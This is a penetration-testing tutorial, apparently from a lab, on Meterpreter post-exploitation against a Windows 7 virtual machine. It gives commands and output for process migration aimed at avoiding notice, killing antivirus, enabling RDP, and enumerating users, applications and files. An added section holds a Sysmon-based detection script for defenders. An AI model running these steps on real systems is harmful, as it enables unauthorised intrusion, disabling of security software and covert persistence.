Process migration
When a meterpreter session has been obtained, or during other testing, the shell is not very stable: the process may be noticed by an administrator or closed by the user, and the penetration then fails. We therefore need to move the shell into a stable process, which also makes the intrusion harder to notice.
1) Manual migration
First use ps to view the processes running on the target

View the current process ID
meterpreter > getpid
Current pid: 1104
From the running processes listed by ps, find the PID of meterpreter. You can see that the current process is 1104, named svchost.exe. Enter migrate 2844 to migrate into explorer.exe, since that process is a stable application, then use getpid again to view the new process ID
meterpreter > migrate 2844
[*] Migrating from 1104 to 2844...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 2844
meterpreter >
2) Automated migration: run post/windows/manage/migrate
Automatically migrates the process into 2092
meterpreter > run post/windows/manage/migrate
[*] Running module against WIN-LJF52BIKAP6
[*] Current server process: Explorer.EXE (2844)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2092
[+] Successfully migrated into process 2092
meterpreter >
System commands
1) View the target's system information: sysinfo
meterpreter > sysinfo
Computer : WIN-LJF52BIKAP6
OS : Windows 7 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
2) Check whether the target is running in a virtual machine: run post/windows/gather/checkvm
meterpreter > run post/windows/gather/checkvm
[*] Checking if WIN-LJF52BIKAP6 is a Virtual Machine ...
[+] This is a VMware Virtual Machine
meterpreter >
3) View the idle time (how long the user has been inactive): idletime
meterpreter > idletime
User has been idle for: 18 mins 41 secs
meterpreter >
4) View the current privileges: getuid
meterpreter > getuid
Server username: WIN-LJF52BIKAP6\root
meterpreter >
5) Shut down antivirus software: run killav
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
meterpreter >
6) Enable the target's Remote Desktop Protocol, RDP (port 3389): run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20210922101221_default_192.168.200.137_host.windows.cle_401476.txt
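As an added example that is not part of the original page, here is the defender's side of the migrate and enable_rdp steps above: the remote-thread injection that migration relies on is commonly recorded by Sysmon as Event ID 8 (CreateRemoteThread), and enable_rdp's changes to fDenyTSConnections and the TermService start type appear as Event ID 13 (registry value set). The events below are constructed JSON lines using Sysmon's field names, and the allow-list of benign remote-thread sources is an assumption to tune per environment.

```python
import json

# Constructed Sysmon-style events (JSON lines), not real captured logs.
# EventID 8 = CreateRemoteThread, EventID 13 = RegistryEvent (value set).
SAMPLE_EVENTS = r"""
{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "SourceProcessId": 1104, "TargetImage": "C:\\Windows\\explorer.exe", "TargetProcessId": 2844}
{"EventID": 8, "SourceImage": "C:\\Windows\\explorer.exe", "SourceProcessId": 2844, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 2092}
{"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections", "Details": "DWORD (0x00000000)"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\services.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\TermService\\Start", "Details": "DWORD (0x00000002)"}
{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "SourceProcessId": 400, "TargetImage": "C:\\Windows\\System32\\svchost.exe", "TargetProcessId": 900}
""".strip().splitlines()

# Assumed allow-list: system processes that create remote threads as part of normal operation.
REMOTE_THREAD_ALLOWLIST = {"csrss.exe", "services.exe"}
# Processes the page shows being used as migration hosts; raise severity when they are the target.
KNOWN_MIGRATION_HOSTS = {"explorer.exe", "notepad.exe"}


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(lines):
    """Scan JSON-lines Sysmon events and return (rule, severity, detail) alerts."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") == 8:
            src, tgt = basename(ev["SourceImage"]), basename(ev["TargetImage"])
            if src in REMOTE_THREAD_ALLOWLIST:
                continue
            severity = "high" if tgt in KNOWN_MIGRATION_HOSTS else "medium"
            detail = f"{src}({ev['SourceProcessId']}) -> {tgt}({ev['TargetProcessId']})"
            alerts.append(("remote_thread_possible_migration", severity, detail))
        elif ev.get("EventID") == 13:
            obj, val = ev["TargetObject"].lower(), ev.get("Details", "")
            # fDenyTSConnections = 0 turns RDP on; TermService Start = 2 means Automatic.
            if obj.endswith("\\terminal server\\fdenytsconnections") and "0x00000000" in val:
                alerts.append(("rdp_enabled_via_registry", "high", ev["Image"]))
            elif obj.endswith("\\services\\termservice\\start") and "0x00000002" in val:
                alerts.append(("termservice_set_to_auto", "medium", ev["Image"]))
    return alerts


if __name__ == "__main__":
    for rule, severity, detail in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {detail}")
```

Correlating a high-severity remote-thread alert with a registry change shortly afterwards from the same host is the pattern the two sections above would leave in the logs.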
7) View how many users are logged on to the target: run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/enum_logged_on_users
[*] Running against session 1
SID User
--- ----
S-1-5-21-2231621843-1934586931-3466173265-1000 WIN-LJF52BIKAP6\root
[+] Results saved in: /root/.msf4/loot/20210922110534_default_192.168.200.137_host.users.activ_248353.txt
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-2231621843-1934586931-3466173265-1000 C:\Users\root
S-1-5-21-2231621843-1934586931-3466173265-1001 C:\Users\ganyu
meterpreter >
8) List the applications the user has installed on the system (only AWVS is present on the target): run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on WIN-LJF52BIKAP6
Name Version
---- -------
Acunetix 13.0.200205121
[+] Results stored in: /root/.msf4/loot/20210922110814_default_192.168.200.137_host.application_719627.txt
meterpreter >
File system commands
View which directory on the target you are currently in: pwd
meterpreter > pwd
C:\Windows\system32
meterpreter >
View which local directory you are currently in: getlwd
meterpreter > getlwd
/root/桌面
meterpreter >
List all files in the current directory: ls
View the contents of the target's file 1.txt: cat 1.txt
meterpreter > cd c:/perfLogs/Admin
meterpreter > ls
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 25 fil 2021-09-22 11:27:28 +0800 1.txt
meterpreter > vim 1.txt
[-] Unknown command: vim.
meterpreter > cat 1.txt
12123wwewdsxcddsdwassdwedmeterpreter >
Search for, copy, and upload files to the target (requires SYSTEM privileges; getsystem or the MS16-032 vulnerability can be used to escalate privileges)
Search the C drive for all files with the .txt suffix: search -f *.txt -d c:\